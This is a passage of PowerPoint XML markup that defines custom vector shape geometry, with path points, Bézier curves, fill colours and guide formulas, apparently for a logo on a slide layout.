                    <a:pt x="131664" y="420997"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="134541" y="423606"/>
                    <a:pt x="138275" y="425078"/>
                    <a:pt x="142164" y="425137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145371" y="425137"/>
                    <a:pt x="147329" y="423926"/>
                    <a:pt x="147329" y="421771"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147329" y="419684"/>
                    <a:pt x="146080" y="418641"/>
                    <a:pt x="140138" y="417059"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132947" y="415174"/>
                    <a:pt x="128322" y="413087"/>
                    <a:pt x="128322" y="405749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128322" y="399050"/>
                    <a:pt x="133521" y="394607"/>
                    <a:pt x="140813" y="394607"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="389320" y="393563"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="397457" y="393563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397457" y="400699"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389320" y="400699"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="321327" y="393563"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="329059" y="393563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329059" y="432139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321327" y="432139"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="223423" y="335565"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="231391" y="355056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215456" y="355056"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="106040" y="335565"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="113974" y="355056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98073" y="355056"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="159752" y="328497"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="149084" y="332031"/>
                    <a:pt x="148206" y="339504"/>
                    <a:pt x="148206" y="347515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148206" y="356334"/>
                    <a:pt x="152392" y="366635"/>
                    <a:pt x="163567" y="366635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174742" y="366635"/>
                    <a:pt x="178624" y="360879"/>
                    <a:pt x="178624" y="360643"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178928" y="360172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178928" y="348727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165424" y="348727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="165424" y="352665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174809" y="352665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="174809" y="358926"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="171712" y="361737"/>
                    <a:pt x="167566" y="363107"/>
                    <a:pt x="163398" y="362696"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152528" y="362696"/>
                    <a:pt x="151920" y="350073"/>
                    <a:pt x="151920" y="347515"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151920" y="339975"/>
                    <a:pt x="152595" y="334959"/>
                    <a:pt x="161001" y="332233"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="166280" y="330833"/>
                    <a:pt x="171897" y="332573"/>
                    <a:pt x="175451" y="336710"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="176700" y="338225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179738" y="335667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="178455" y="334185"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178118" y="333781"/>
                    <a:pt x="170420" y="324962"/>
                    <a:pt x="159752" y="328497"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="420852" y="328396"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="420852" y="366635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445193" y="366635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445193" y="362696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424937" y="362696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424937" y="352026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440872" y="352026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440872" y="348088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424937" y="348088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424937" y="332334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445193" y="332334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445193" y="328396"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="323319" y="328396"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="323319" y="366635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327270" y="366635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327270" y="328396"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="267244" y="328396"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="267244" y="332334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285576" y="332334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265793" y="366635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290944" y="366635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290944" y="362696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272612" y="362696"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292362" y="328396"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="359038" y="326915"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="359038" y="366635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362988" y="366635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="362988" y="337585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388476" y="367375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="388476" y="327655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384527" y="327655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384527" y="356805"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="223424" y="325131"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="206847" y="365759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211067" y="365759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213870" y="359027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233012" y="359027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235746" y="365759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="240034" y="365759"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="106006" y="325131"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="89430" y="365759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93650" y="365759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96452" y="359027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115594" y="359027"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118329" y="365759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122616" y="365759"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="25016" y="324458"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="25016" y="366567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28966" y="366567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28966" y="336272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42268" y="354045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55603" y="336340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55603" y="366635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59552" y="366635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59552" y="324458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="42268" y="347414"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="0" y="110037"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4895" y="125723"/>
                    <a:pt x="20864" y="154503"/>
                    <a:pt x="72584" y="172949"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146856" y="199339"/>
                    <a:pt x="151549" y="210919"/>
                    <a:pt x="150232" y="225729"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148915" y="240541"/>
                    <a:pt x="141826" y="258583"/>
                    <a:pt x="105669" y="258583"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69478" y="258583"/>
                    <a:pt x="56582" y="237982"/>
                    <a:pt x="56582" y="206442"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="206442"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="362009" y="54463"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="403972" y="54463"/>
                    <a:pt x="408496" y="86003"/>
                    <a:pt x="408496" y="86003"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="407889" y="113706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466496" y="113706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466496" y="198060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407889" y="198060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407889" y="218795"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="407889" y="218795"/>
                    <a:pt x="409172" y="257943"/>
                    <a:pt x="366532" y="257943"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323894" y="257943"/>
                    <a:pt x="313563" y="230139"/>
                    <a:pt x="313563" y="211861"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="313563" y="98895"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="313563" y="86003"/>
                    <a:pt x="320045" y="54463"/>
                    <a:pt x="362009" y="54463"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="392257" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="466529" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="466529" y="48337"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="460351" y="30530"/>
                    <a:pt x="442391" y="6968"/>
                    <a:pt x="392257" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="137268" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="333076" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="257724" y="11647"/>
                    <a:pt x="242566" y="70318"/>
                    <a:pt x="242566" y="91154"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="242566" y="224350"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="242566" y="224350"/>
                    <a:pt x="246448" y="315234"/>
                    <a:pt x="360726" y="315234"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="436179" y="315234"/>
                    <a:pt x="459406" y="286623"/>
                    <a:pt x="466496" y="259963"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="466496" y="377406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="377406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="249494"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8575" y="279890"/>
                    <a:pt x="34705" y="315234"/>
                    <a:pt x="109754" y="315301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="241350" y="315301"/>
                    <a:pt x="222445" y="203278"/>
                    <a:pt x="222445" y="203278"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="222445" y="203278"/>
                    <a:pt x="211000" y="149151"/>
                    <a:pt x="132204" y="129224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53408" y="109297"/>
                    <a:pt x="65697" y="79002"/>
                    <a:pt x="65697" y="79002"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65697" y="79002"/>
                    <a:pt x="66473" y="54026"/>
                    <a:pt x="109585" y="52073"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="152697" y="50121"/>
                    <a:pt x="150772" y="100983"/>
                    <a:pt x="150772" y="100983"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="221668" y="100983"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="221668" y="100983"/>
                    <a:pt x="233720" y="14440"/>
                    <a:pt x="137268" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="78931" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="25421" y="7978"/>
                    <a:pt x="6381" y="37936"/>
                    <a:pt x="0" y="62812"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="7F807F"/>
            </a:solidFill>
            <a:ln w="94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 91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{486F2894-4772-5E42-96CF-9AF6E2CA15E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1530281" y="302273"/>
              <a:ext cx="476571" cy="430935"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 237573 w 476571"/>
                <a:gd name="connsiteY0" fmla="*/ 338306 h 430935"/>
                <a:gd name="connsiteX1" fmla="*/ 181287 w 476571"/>
                <a:gd name="connsiteY1" fmla="*/ 341088 h 430935"/>
                <a:gd name="connsiteX2" fmla="*/ 139278 w 476571"/>
                <a:gd name="connsiteY2" fmla="*/ 350441 h 430935"/>
                <a:gd name="connsiteX3" fmla="*/ 238270 w 476571"/>
                <a:gd name="connsiteY3" fmla="*/ 414287 h 430935"/>
                <a:gd name="connsiteX4" fmla="*/ 336636 w 476571"/>
                <a:gd name="connsiteY4" fmla="*/ 351813 h 430935"/>
                <a:gd name="connsiteX5" fmla="*/ 292778 w 476571"/>
                <a:gd name="connsiteY5" fmla="*/ 341088 h 430935"/>
                <a:gd name="connsiteX6" fmla="*/ 237573 w 476571"/>
                <a:gd name="connsiteY6" fmla="*/ 338306 h 430935"/>
                <a:gd name="connsiteX7" fmla="*/ 229749 w 476571"/>
                <a:gd name="connsiteY7" fmla="*/ 303709 h 430935"/>
                <a:gd name="connsiteX8" fmla="*/ 234260 w 476571"/>
                <a:gd name="connsiteY8" fmla="*/ 303709 h 430935"/>
                <a:gd name="connsiteX9" fmla="*/ 242562 w 476571"/>
                <a:gd name="connsiteY9" fmla="*/ 313155 h 430935"/>
                <a:gd name="connsiteX10" fmla="*/ 235388 w 476571"/>
                <a:gd name="connsiteY10" fmla="*/ 321729 h 430935"/>
                <a:gd name="connsiteX11" fmla="*/ 229749 w 476571"/>
                <a:gd name="connsiteY11" fmla="*/ 321729 h 430935"/>
                <a:gd name="connsiteX12" fmla="*/ 223452 w 476571"/>
                <a:gd name="connsiteY12" fmla="*/ 298409 h 430935"/>
                <a:gd name="connsiteX13" fmla="*/ 223452 w 476571"/>
                <a:gd name="connsiteY13" fmla="*/ 327028 h 430935"/>
                <a:gd name="connsiteX14" fmla="*/ 235983 w 476571"/>
                <a:gd name="connsiteY14" fmla="*/ 327028 h 430935"/>
                <a:gd name="connsiteX15" fmla="*/ 249047 w 476571"/>
                <a:gd name="connsiteY15" fmla="*/ 312563 h 430935"/>
                <a:gd name="connsiteX16" fmla="*/ 235983 w 476571"/>
                <a:gd name="connsiteY16" fmla="*/ 298409 h 430935"/>
                <a:gd name="connsiteX17" fmla="*/ 275142 w 476571"/>
                <a:gd name="connsiteY17" fmla="*/ 298316 h 430935"/>
                <a:gd name="connsiteX18" fmla="*/ 268876 w 476571"/>
                <a:gd name="connsiteY18" fmla="*/ 317987 h 430935"/>
                <a:gd name="connsiteX19" fmla="*/ 262172 w 476571"/>
                <a:gd name="connsiteY19" fmla="*/ 298409 h 430935"/>
                <a:gd name="connsiteX20" fmla="*/ 253275 w 476571"/>
                <a:gd name="connsiteY20" fmla="*/ 298409 h 430935"/>
                <a:gd name="connsiteX21" fmla="*/ 253275 w 476571"/>
                <a:gd name="connsiteY21" fmla="*/ 327028 h 430935"/>
                <a:gd name="connsiteX22" fmla="*/ 259228 w 476571"/>
                <a:gd name="connsiteY22" fmla="*/ 327028 h 430935"/>
                <a:gd name="connsiteX23" fmla="*/ 259228 w 476571"/>
                <a:gd name="connsiteY23" fmla="*/ 306951 h 430935"/>
                <a:gd name="connsiteX24" fmla="*/ 266276 w 476571"/>
                <a:gd name="connsiteY24" fmla="*/ 327028 h 430935"/>
                <a:gd name="connsiteX25" fmla="*/ 271194 w 476571"/>
                <a:gd name="connsiteY25" fmla="*/ 327028 h 430935"/>
                <a:gd name="connsiteX26" fmla="*/ 278211 w 476571"/>
                <a:gd name="connsiteY26" fmla="*/ 306764 h 430935"/>
                <a:gd name="connsiteX27" fmla="*/ 278305 w 476571"/>
                <a:gd name="connsiteY27" fmla="*/ 306764 h 430935"/>
                <a:gd name="connsiteX28" fmla="*/ 278305 w 476571"/>
                <a:gd name="connsiteY28" fmla="*/ 326934 h 430935"/>
                <a:gd name="connsiteX29" fmla="*/ 284038 w 476571"/>
                <a:gd name="connsiteY29" fmla="*/ 326934 h 430935"/>
                <a:gd name="connsiteX30" fmla="*/ 284038 w 476571"/>
                <a:gd name="connsiteY30" fmla="*/ 298316 h 430935"/>
                <a:gd name="connsiteX31" fmla="*/ 206755 w 476571"/>
                <a:gd name="connsiteY31" fmla="*/ 297723 h 430935"/>
                <a:gd name="connsiteX32" fmla="*/ 192627 w 476571"/>
                <a:gd name="connsiteY32" fmla="*/ 312843 h 430935"/>
                <a:gd name="connsiteX33" fmla="*/ 206755 w 476571"/>
                <a:gd name="connsiteY33" fmla="*/ 327714 h 430935"/>
                <a:gd name="connsiteX34" fmla="*/ 219286 w 476571"/>
                <a:gd name="connsiteY34" fmla="*/ 315992 h 430935"/>
                <a:gd name="connsiteX35" fmla="*/ 213021 w 476571"/>
                <a:gd name="connsiteY35" fmla="*/ 315992 h 430935"/>
                <a:gd name="connsiteX36" fmla="*/ 206474 w 476571"/>
                <a:gd name="connsiteY36" fmla="*/ 322414 h 430935"/>
                <a:gd name="connsiteX37" fmla="*/ 198955 w 476571"/>
                <a:gd name="connsiteY37" fmla="*/ 312843 h 430935"/>
                <a:gd name="connsiteX38" fmla="*/ 206755 w 476571"/>
                <a:gd name="connsiteY38" fmla="*/ 303023 h 430935"/>
                <a:gd name="connsiteX39" fmla="*/ 213021 w 476571"/>
                <a:gd name="connsiteY39" fmla="*/ 308043 h 430935"/>
                <a:gd name="connsiteX40" fmla="*/ 219286 w 476571"/>
                <a:gd name="connsiteY40" fmla="*/ 308043 h 430935"/>
                <a:gd name="connsiteX41" fmla="*/ 206755 w 476571"/>
                <a:gd name="connsiteY41" fmla="*/ 297723 h 430935"/>
                <a:gd name="connsiteX42" fmla="*/ 312420 w 476571"/>
                <a:gd name="connsiteY42" fmla="*/ 297567 h 430935"/>
                <a:gd name="connsiteX43" fmla="*/ 307502 w 476571"/>
                <a:gd name="connsiteY43" fmla="*/ 307544 h 430935"/>
                <a:gd name="connsiteX44" fmla="*/ 296412 w 476571"/>
                <a:gd name="connsiteY44" fmla="*/ 309133 h 430935"/>
                <a:gd name="connsiteX45" fmla="*/ 304432 w 476571"/>
                <a:gd name="connsiteY45" fmla="*/ 316896 h 430935"/>
                <a:gd name="connsiteX46" fmla="*/ 302552 w 476571"/>
                <a:gd name="connsiteY46" fmla="*/ 327870 h 430935"/>
                <a:gd name="connsiteX47" fmla="*/ 312420 w 476571"/>
                <a:gd name="connsiteY47" fmla="*/ 322695 h 430935"/>
                <a:gd name="connsiteX48" fmla="*/ 322319 w 476571"/>
                <a:gd name="connsiteY48" fmla="*/ 327870 h 430935"/>
                <a:gd name="connsiteX49" fmla="*/ 320440 w 476571"/>
                <a:gd name="connsiteY49" fmla="*/ 316896 h 430935"/>
                <a:gd name="connsiteX50" fmla="*/ 328428 w 476571"/>
                <a:gd name="connsiteY50" fmla="*/ 309133 h 430935"/>
                <a:gd name="connsiteX51" fmla="*/ 317370 w 476571"/>
                <a:gd name="connsiteY51" fmla="*/ 307544 h 430935"/>
                <a:gd name="connsiteX52" fmla="*/ 164151 w 476571"/>
                <a:gd name="connsiteY52" fmla="*/ 297567 h 430935"/>
                <a:gd name="connsiteX53" fmla="*/ 159202 w 476571"/>
                <a:gd name="connsiteY53" fmla="*/ 307544 h 430935"/>
                <a:gd name="connsiteX54" fmla="*/ 148143 w 476571"/>
                <a:gd name="connsiteY54" fmla="*/ 309133 h 430935"/>
                <a:gd name="connsiteX55" fmla="*/ 156132 w 476571"/>
                <a:gd name="connsiteY55" fmla="*/ 316896 h 430935"/>
                <a:gd name="connsiteX56" fmla="*/ 154252 w 476571"/>
                <a:gd name="connsiteY56" fmla="*/ 327870 h 430935"/>
                <a:gd name="connsiteX57" fmla="*/ 164151 w 476571"/>
                <a:gd name="connsiteY57" fmla="*/ 322695 h 430935"/>
                <a:gd name="connsiteX58" fmla="*/ 174051 w 476571"/>
                <a:gd name="connsiteY58" fmla="*/ 327870 h 430935"/>
                <a:gd name="connsiteX59" fmla="*/ 172296 w 476571"/>
                <a:gd name="connsiteY59" fmla="*/ 316896 h 430935"/>
                <a:gd name="connsiteX60" fmla="*/ 180222 w 476571"/>
                <a:gd name="connsiteY60" fmla="*/ 309133 h 430935"/>
                <a:gd name="connsiteX61" fmla="*/ 169164 w 476571"/>
                <a:gd name="connsiteY61" fmla="*/ 307544 h 430935"/>
                <a:gd name="connsiteX62" fmla="*/ 207288 w 476571"/>
                <a:gd name="connsiteY62" fmla="*/ 238521 h 430935"/>
                <a:gd name="connsiteX63" fmla="*/ 202213 w 476571"/>
                <a:gd name="connsiteY63" fmla="*/ 244071 h 430935"/>
                <a:gd name="connsiteX64" fmla="*/ 212269 w 476571"/>
                <a:gd name="connsiteY64" fmla="*/ 244071 h 430935"/>
                <a:gd name="connsiteX65" fmla="*/ 207288 w 476571"/>
                <a:gd name="connsiteY65" fmla="*/ 238521 h 430935"/>
                <a:gd name="connsiteX66" fmla="*/ 280905 w 476571"/>
                <a:gd name="connsiteY66" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX67" fmla="*/ 283474 w 476571"/>
                <a:gd name="connsiteY67" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX68" fmla="*/ 289144 w 476571"/>
                <a:gd name="connsiteY68" fmla="*/ 250368 h 430935"/>
                <a:gd name="connsiteX69" fmla="*/ 294188 w 476571"/>
                <a:gd name="connsiteY69" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX70" fmla="*/ 296663 w 476571"/>
                <a:gd name="connsiteY70" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX71" fmla="*/ 290178 w 476571"/>
                <a:gd name="connsiteY71" fmla="*/ 253797 h 430935"/>
                <a:gd name="connsiteX72" fmla="*/ 284978 w 476571"/>
                <a:gd name="connsiteY72" fmla="*/ 258380 h 430935"/>
                <a:gd name="connsiteX73" fmla="*/ 281657 w 476571"/>
                <a:gd name="connsiteY73" fmla="*/ 257570 h 430935"/>
                <a:gd name="connsiteX74" fmla="*/ 282440 w 476571"/>
                <a:gd name="connsiteY74" fmla="*/ 255637 h 430935"/>
                <a:gd name="connsiteX75" fmla="*/ 284884 w 476571"/>
                <a:gd name="connsiteY75" fmla="*/ 256229 h 430935"/>
                <a:gd name="connsiteX76" fmla="*/ 288017 w 476571"/>
                <a:gd name="connsiteY76" fmla="*/ 253112 h 430935"/>
                <a:gd name="connsiteX77" fmla="*/ 234135 w 476571"/>
                <a:gd name="connsiteY77" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX78" fmla="*/ 236484 w 476571"/>
                <a:gd name="connsiteY78" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX79" fmla="*/ 236484 w 476571"/>
                <a:gd name="connsiteY79" fmla="*/ 246471 h 430935"/>
                <a:gd name="connsiteX80" fmla="*/ 240807 w 476571"/>
                <a:gd name="connsiteY80" fmla="*/ 251366 h 430935"/>
                <a:gd name="connsiteX81" fmla="*/ 241167 w 476571"/>
                <a:gd name="connsiteY81" fmla="*/ 251351 h 430935"/>
                <a:gd name="connsiteX82" fmla="*/ 245506 w 476571"/>
                <a:gd name="connsiteY82" fmla="*/ 246284 h 430935"/>
                <a:gd name="connsiteX83" fmla="*/ 245506 w 476571"/>
                <a:gd name="connsiteY83" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX84" fmla="*/ 247793 w 476571"/>
                <a:gd name="connsiteY84" fmla="*/ 236931 h 430935"/>
                <a:gd name="connsiteX85" fmla="*/ 247793 w 476571"/>
                <a:gd name="connsiteY85" fmla="*/ 253143 h 430935"/>
                <a:gd name="connsiteX86" fmla="*/ 245506 w 476571"/>
                <a:gd name="connsiteY86" fmla="*/ 253143 h 430935"/>
                <a:gd name="connsiteX87" fmla="*/ 245506 w 476571"/>
                <a:gd name="connsiteY87" fmla="*/ 250306 h 430935"/>
                <a:gd name="connsiteX88" fmla="*/ 240149 w 476571"/>
                <a:gd name="connsiteY88" fmla="*/ 253423 h 430935"/>
                <a:gd name="connsiteX89" fmla="*/ 239327 w 476571"/>
                <a:gd name="connsiteY89" fmla="*/ 253389 h 430935"/>
                <a:gd name="connsiteX90" fmla="*/ 234135 w 476571"/>
                <a:gd name="connsiteY90" fmla="*/ 246908 h 430935"/>
                <a:gd name="connsiteX91" fmla="*/ 263989 w 476571"/>
                <a:gd name="connsiteY91" fmla="*/ 236838 h 430935"/>
                <a:gd name="connsiteX92" fmla="*/ 266307 w 476571"/>
                <a:gd name="connsiteY92" fmla="*/ 236838 h 430935"/>
                <a:gd name="connsiteX93" fmla="*/ 266307 w 476571"/>
                <a:gd name="connsiteY93" fmla="*/ 253081 h 430935"/>
                <a:gd name="connsiteX94" fmla="*/ 263989 w 476571"/>
                <a:gd name="connsiteY94" fmla="*/ 253081 h 430935"/>
                <a:gd name="connsiteX95" fmla="*/ 225019 w 476571"/>
                <a:gd name="connsiteY95" fmla="*/ 236682 h 430935"/>
                <a:gd name="connsiteX96" fmla="*/ 231284 w 476571"/>
                <a:gd name="connsiteY96" fmla="*/ 239581 h 430935"/>
                <a:gd name="connsiteX97" fmla="*/ 229749 w 476571"/>
                <a:gd name="connsiteY97" fmla="*/ 241265 h 430935"/>
                <a:gd name="connsiteX98" fmla="*/ 224988 w 476571"/>
                <a:gd name="connsiteY98" fmla="*/ 238802 h 430935"/>
                <a:gd name="connsiteX99" fmla="*/ 224967 w 476571"/>
                <a:gd name="connsiteY99" fmla="*/ 238803 h 430935"/>
                <a:gd name="connsiteX100" fmla="*/ 219411 w 476571"/>
                <a:gd name="connsiteY100" fmla="*/ 245037 h 430935"/>
                <a:gd name="connsiteX101" fmla="*/ 219407 w 476571"/>
                <a:gd name="connsiteY101" fmla="*/ 245143 h 430935"/>
                <a:gd name="connsiteX102" fmla="*/ 225144 w 476571"/>
                <a:gd name="connsiteY102" fmla="*/ 251272 h 430935"/>
                <a:gd name="connsiteX103" fmla="*/ 229812 w 476571"/>
                <a:gd name="connsiteY103" fmla="*/ 249028 h 430935"/>
                <a:gd name="connsiteX104" fmla="*/ 231284 w 476571"/>
                <a:gd name="connsiteY104" fmla="*/ 250462 h 430935"/>
                <a:gd name="connsiteX105" fmla="*/ 225019 w 476571"/>
                <a:gd name="connsiteY105" fmla="*/ 253579 h 430935"/>
                <a:gd name="connsiteX106" fmla="*/ 224950 w 476571"/>
                <a:gd name="connsiteY106" fmla="*/ 253577 h 430935"/>
